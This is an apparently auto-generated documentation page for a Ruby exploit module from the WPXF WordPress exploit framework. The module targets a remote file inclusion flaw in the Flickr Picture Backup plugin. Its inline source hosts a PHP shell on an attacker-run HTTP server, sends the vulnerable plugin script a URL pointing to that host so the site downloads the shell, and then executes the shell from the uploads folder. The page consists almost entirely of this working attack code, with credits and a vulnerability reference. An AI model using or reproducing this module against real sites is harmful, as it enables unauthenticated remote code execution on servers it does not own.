class Wpxf::Exploit::FlickrPictureBackupRfiShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 8 def initialize super update_info( name: 'Flickr Picture Backup RFI Shell Upload', desc: %( Flickr Picture Bacup suffers from a remote file inclusion vulnerability which allows unauthenticated users to download and execute a PHP shell hosted on a remote server. This module will host a HTTP server to serve the payload, and make a request to the target that will initiate the download and execution of the payload. ), author: [ 'Larry W. Cashdollar', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8803'], ['URL', 'http://www.vapidlabs.com/advisory.php?v=190'] ], date: 'Apr 26 2017' ) register_options([ StringOption.new( name: 'rfi_host', desc: 'The address of the host listening for a connection', required: true ), StringOption.new( name: 'rfi_path', desc: 'The path to access via the remote file inclusion request', default: Utility::Text.rand_alpha(8), required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 47 def check check_plugin_version_from_readme('flickr-picture-backup', '0.9') end
execute_payload(url)
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload#execute_payload
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 85 def execute_payload(url) stop_http_server super(url) end
on_http_request(_path, _params, _headers)
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 63 def on_http_request(_path, _params, _headers) payload.encoded end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 79 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('url', rfi_url) builder end
rfi_host()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 51 def rfi_host normalized_option_value('rfi_host') end
rfi_path()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 55 def rfi_path normalized_option_value('rfi_path') end
rfi_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 59 def rfi_url "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}" end
run()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 90 def run start_http_server true super end
upload_request_params()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 71 def upload_request_params { 'url' => rfi_url } end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 75 def uploaded_payload_location normalize_uri(wordpress_url_uploads, 'flickr_backup', payload_name) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb, line 67 def uploader_url normalize_uri(wordpress_url_plugins, 'flickr-picture-backup', 'flickr-picture-download.php') end